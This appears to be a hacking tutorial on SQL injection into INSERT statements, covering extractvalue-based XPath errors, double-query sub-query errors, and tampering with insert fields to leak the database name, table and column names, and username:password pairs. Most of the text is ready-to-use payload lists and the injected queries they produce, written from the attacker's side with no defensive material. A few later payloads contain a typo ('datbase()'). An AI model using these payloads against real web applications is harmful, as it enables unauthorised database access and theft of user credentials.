🔰Insert Query Injection

So here we will discuss on how a hacker can Abuse new record insertion process using Insert Query Injection.

You can achieve this using the following Injections

1. Xpath Injection

2. Sub Query Injection

3. Tempering the Insert Query input values to get the Output.

-------------------------------------------------------------

Exploitation using XPATH injection:

It will work when the developer have inserted the error function over there. else only 3rd injection will work

Query:

insert into posts (title,post_data,label) value ('$title','$post_data','$label')

Injection:

' extractvalue(0x0a,concat(0x0a,(select database()))) '
" extractvalue(0x0a,concat(0x0a,(select database()))) "
' extractvalue(0x0a,concat(0x0a,(select database())))--+
" extractvalue(0x0a,concat(0x0a,(select database())))--+
' extractvalue(0x0a,concat(0x0a,(select database())))#
" extractvalue(0x0a,concat(0x0a,(select database())))#
' extractvalue(0x0a,concat(0x0a,(select database())))--
" extractvalue(0x0a,concat(0x0a,(select database())))--

Now lets see what will the query passed. For the above given Query first injection will work.

$title = ' extractvalue(0x0a,concat(0x0a,(select database()))) '
Injection:
insert into posts (title,post_data,label) value (' extractvalue(0x0a,concat(0x0a,(select database()))) ','$post_data','$label')

So actually the above query will output the data in form of error. for rest of Exploitation using XPATH read XPATH Injection

-------------------------------------------------------------

Exploitation using Sub-Query Injection:

Query:

insert into posts (title,post_data,label) value ('$title','$post_data','$label')

Injection:

' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) "
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--+
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--+
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--

Now lets see what will the query passed when title is injected. For the above given Query first injection will work.

$title = ' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '

Injection:
insert into posts (title,post_data,label) value ('' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '','$post_data','$label')

So actually the above query will output the data in form of error. for rest of Exploitation using Sub Query Injectoin. But it will only work when the developer is printing any error. So now lets start with our 3rd method.

-------------------------------------------------------------

Exploitation using Tempering the Insert Query input

Well this time we are not going to create any error assuming that the developer is not giving any error. So we will get the output by inserting the injection and then insert it. After that we will check the Inserted value to get the data.

Unlike Update Query Injection in insert query we are not usually bound to use the same variable space, as here we have multiple injectable parameters in a insert query.

So lets start the exploitation

Query:

insert into posts (title,post_data,label) value ('$title','$post_data','$label')

Our Input is going to $title, $post_data, $label variable. This time we will inject and comment out rest of the query.

So our input in these variables goes this way:

$title = it starts here
$post_data = any data',database())--
$label = 

So as per our input we have left the label field empty as we dont require it anymore. what we did is we added one more parameter in $post_data variable, which when injected in the SQL Query will be used for $label and the rest of the query will be skipped. Lets see how the Query will look like.

Query:

insert into posts (title,post_data,label) value ('it starts here','any data',database())--','')

So if the Label is viewable you will see the database() string over there, and now you can start exploiting with the Following Queries.

Setting up post data to get the Tables:

$post_data = any data',(select group_concat(table_name) from information_schema.tables where table_schema=datbase()))--

Setting up post data to get the columns:

$post_data = any data',(select group_concat(column_name) from information_schema.columns where table_schema=datbase() and table_name='any__table_name_here'))--

Setting up post data to get the columns data:

$post_data = any data',(select group_concat(username,0x3a,password) from any_table_name_here))--

You can also use Limit if required, if you dont know how to use Limit go and read Death Row Injection.

-------------------------------------------------------------